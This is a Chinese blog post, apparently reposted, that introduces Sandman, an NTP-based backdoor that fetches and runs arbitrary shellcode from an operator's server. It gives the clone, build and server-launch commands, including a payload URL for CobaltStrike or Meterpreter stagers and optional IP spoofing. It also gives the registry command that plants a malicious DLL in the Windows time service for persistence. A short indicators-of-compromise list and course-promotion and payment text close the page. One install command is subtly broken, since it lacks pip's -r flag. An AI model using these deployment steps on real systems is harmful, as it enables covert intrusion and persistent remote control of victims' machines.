Sandman:一款基于NTP协议的红队后门研究工具

Sandman是一个利用NTP协议执行红队任务的后门工具,能够在安全增强型网络中运行,因为它经常被防火墙忽视。工具包括服务器端和客户端组件,支持Payload获取和IP欺骗。用户需安装Python3.9环境,并配置相关依赖。SandmanBackdoor和SandmanBackdoorTimeProvider分别用于直接执行和利用W32Time服务注入Shellcode。文章还提到了入侵威胁指标,如Shellcode注入和可疑NTP头信息的检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

关于Sandman

Sandman是一款基于NTP的强大后门工具,该工具可以帮助广大研究人员在一个安全增强型网络系统中执行红队任务。

Sandman可以充当Stager使用,该工具利用了NTP(一个用于计算机时间/日期同步协议)从预定义的服务器获取并运行任意Shell代码。

由于NTP这个协议是很多安全防御人员往往会忽略的一个协议,因此很多网络系统中并不会针对NTP进行检测。

功能介绍

1、允许从研究人员控制的服务器获取并执行任意Payload;

2、由于网络防火墙系统中通常会允许使用NTP协议,因此可以将其用于安全增强型网络系统中;

3、支持通过IP欺骗技术来模拟合法的NTP服务器;

工具安装

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/Idov31/Sandman.git

SandmanServer

我们需要在服务器端安装并配置好Python 3.9环境,然后使用项目提供的 requirements
.txt
文件和pip3命令配置Sandman服务器所需的依赖组件:

cd Sandman

pip3 install requirements.txt

SandmanBackdoor

将项目导入到Visual Studio中,然后使用USE_SHELLCODE完成代码编译即可。

SandmanBackdoorTimeProvider

首先,安装好 DllExport,然后将项目导入到Visual
Studio中,并使用USE_SHELLCODE完成代码编译即可。

工具使用

SandmanServer使用

在Windows或类Unix设备上运行下列命令即可:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"

其中,Network Adapter是需要让服务器监听的网络适配器,例如Ethernet、eth0等;Payload
Url即为托管Shellcode的URL地址,例如CobaltStrike、Meterpreter或其他Stager;对于IP to
Spoof,如果你想要执行IP地址欺骗(模拟),可以使用该选项;

SandmanBackdoor使用

首先,我们需要完成SandmanBackdoor的编译。其次,由于它是一个轻量级的独立C2可执行文件,因此我们可以通过ExecuteAssembly来直接运行它。

SandmanBackdoorTimeProvider使用

如需使用SandmanBackdoorTimeProvider,可以按照下列步骤操作:

首先,添加下列注册表项:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"

接下来,重启w32time服务:

sc stop w32time

sc start w32time

注意事项:确保使用的是x64选项编译工具源码。

工具运行截图

入侵威胁指标IoC

1、工具会将一个Shellcode注入到RuntimeBroker中;

2、NTP通信会使用可疑的Header;

3、可以使用YARA规则检测;

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值